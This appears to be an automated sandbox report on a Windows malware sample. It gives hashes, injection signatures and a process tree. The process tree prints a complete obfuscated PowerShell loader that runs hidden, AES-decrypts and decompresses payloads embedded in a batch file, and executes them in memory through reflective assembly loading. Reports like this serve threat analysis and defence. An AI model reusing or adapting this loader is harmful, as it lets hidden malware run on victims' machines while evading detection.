Analysis
-
max time kernel
56s -
max time network
101s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
02/08/2023, 16:45
Static task
static1
Behavioral task
behavioral1
Sample
0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe
Resource
win10v2004-20230703-en
General
-
Target
0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe
-
Size
591KB
-
MD5
07f93a3fafb4bdfc8ee14e75d3a067ed
-
SHA1
fe949c7d2a6e7fdbfe80f88b77ac121ff78473e0
-
SHA256
0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9ed
-
SHA512
cb415168819bf56f797a20c2d081239d37f6440a480b5807ae425afd2261cf6079318f4b176282f6215b6a55f2b11c33355dbc553cddbdd31dbd6c6799b695f2
-
SSDEEP
12288:d8Ax7GrNHgsg5vcj61pn5P2uFe7IGxdjI73Jxge4WFNMiyxlwn:qAx7Gxe5vQcp8hVxE3jge4uml2
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1924 gtwwhbs.bat.scr -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4992 set thread context of 4520 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe 90 -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe Token: SeDebugPrivilege 4520 MSBuild.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4992 wrote to memory of 4520 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe 90 PID 4992 wrote to memory of 4520 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe 90 PID 4992 wrote to memory of 4520 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe 90 PID 4992 wrote to memory of 4520 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe 90 PID 4992 wrote to memory of 4520 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe 90 PID 4992 wrote to memory of 4520 4992 0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe 90 PID 888 wrote to memory of 4268 888 cmd.exe 98 PID 888 wrote to memory of 4268 888 cmd.exe 98 PID 4268 wrote to memory of 1924 4268 cmd.exe 100 PID 4268 wrote to memory of 1924 4268 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe"C:\Users\Admin\AppData\Local\Temp\0a2a3e6eb5d920e00c424039f54ad1b9f66ecf1c7f854c544e9b2e22d153c9edexe_JC.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat.scr"C:\Users\Admin\AppData\Local\Temp\gtwwhbs.bat.scr" -w hidden -c $IoHI='GbhTxebhTxtCubhTxrrbhTxentPbhTxrbhTxocbhTxessbhTx'.Replace('bhTx', '');$YThx='RbhTxeadbhTxLbhTxinebhTxsbhTx'.Replace('bhTx', '');$BZdR='SplbhTxitbhTx'.Replace('bhTx', '');$wkMM='LoabhTxdbhTx'.Replace('bhTx', '');$Schx='InbhTxvbhTxokbhTxebhTx'.Replace('bhTx', '');$sOYv='MbhTxaibhTxnbhTxMobhTxdbhTxubhTxlebhTx'.Replace('bhTx', '');$GewW='EntrbhTxyPbhTxoinbhTxtbhTx'.Replace('bhTx', '');$RDDF='ChabhTxngbhTxebhTxExtbhTxenbhTxsiobhTxnbhTx'.Replace('bhTx', '');$BRFZ='ElbhTxebhTxmenbhTxtbhTxAbhTxtbhTx'.Replace('bhTx', '');$xRuw='TrabhTxnbhTxsfbhTxormbhTxFinbhTxalBbhTxlobhTxckbhTx'.Replace('bhTx', '');$lEbe='FrbhTxombhTxBasbhTxe64bhTxSbhTxtbhTxrinbhTxgbhTx'.Replace('bhTx', '');$DxEM='CrbhTxeatebhTxDebhTxcrbhTxypbhTxtorbhTx'.Replace('bhTx', '');function sTHNF($KOZoK){$uSSaq=[System.Security.Cryptography.Aes]::Create();$uSSaq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uSSaq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uSSaq.Key=[System.Convert]::$lEbe('l1mGzzW6VwnSMBDn3abAktdzHpgQ2u2J5US922yw3C4=');$uSSaq.IV=[System.Convert]::$lEbe('PRGOu0v/8IP/KoS6c9wTWg==');$fXZmM=$uSSaq.$DxEM();$TBSvx=$fXZmM.$xRuw($KOZoK,0,$KOZoK.Length);$fXZmM.Dispose();$uSSaq.Dispose();$TBSvx;}function UbSiJ($KOZoK){$sixLe=New-Object System.IO.MemoryStream(,$KOZoK);$QrGpd=New-Object System.IO.MemoryStream;$Peavr=New-Object System.IO.Compression.GZipStream($sixLe,[IO.Compression.CompressionMode]::Decompress);$Peavr.CopyTo($QrGpd);$Peavr.Dispose();$sixLe.Dispose();$QrGpd.Dispose();$QrGpd.ToArray();}$EWpTE=[System.Linq.Enumerable]::$BRFZ([System.IO.File]::$YThx([System.IO.Path]::$RDDF([System.Diagnostics.Process]::$IoHI().$sOYv.FileName, $null)), 1);$GVKYS=$EWpTE.Substring(2).$BZdR(':');$swpDj=UbSiJ (sTHNF ([Convert]::$lEbe($GVKYS[0])));$nvyDR=UbSiJ (sTHNF ([Convert]::$lEbe($GVKYS[1])));[System.Reflection.Assembly]::$wkMM([byte[]]$nvyDR).$GewW.$Schx($null,$null);[System.Reflection.Assembly]::$wkMM([byte[]]$swpDj).$GewW.$Schx($null,$null);3⤵
- Executes dropped EXE
PID:1924
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD51551e43ba5cc0468ffa4d54d29870ac0
SHA12c61b5443a387146b2bc91432e433eddd885643b
SHA256670804e6feb3e0fe86cff07d3ce364ba57842eac02a4c1248989b7a9c1b97de9
SHA5122fac29db81f334ae08944009a82f9c3d70bf4e0e291b826aaaa8f822e0f80962ab9dc75d97515d55ad95f6bf4903619e2484ff3e4799bd2ac9cc4bfdaf9b550f
-
Filesize
192KB
MD5d64253fa665ae070d95e8b9438ab2697
SHA1ae8930de4f5dfeb31246043d4cf1ed9814cc4db4
SHA2565ff7d7573a6a1cfa04a9191c1cb4626b0d200b9077258557fdc7ea06c87bf743
SHA512cd9fa8738caadd34c118de0faad66c4470f49673bc23b023f24a6e1aaa7869a91f9fe9e849c411331fe7352df38dbc100d715d35fef64cff5c4f45b05d3c6468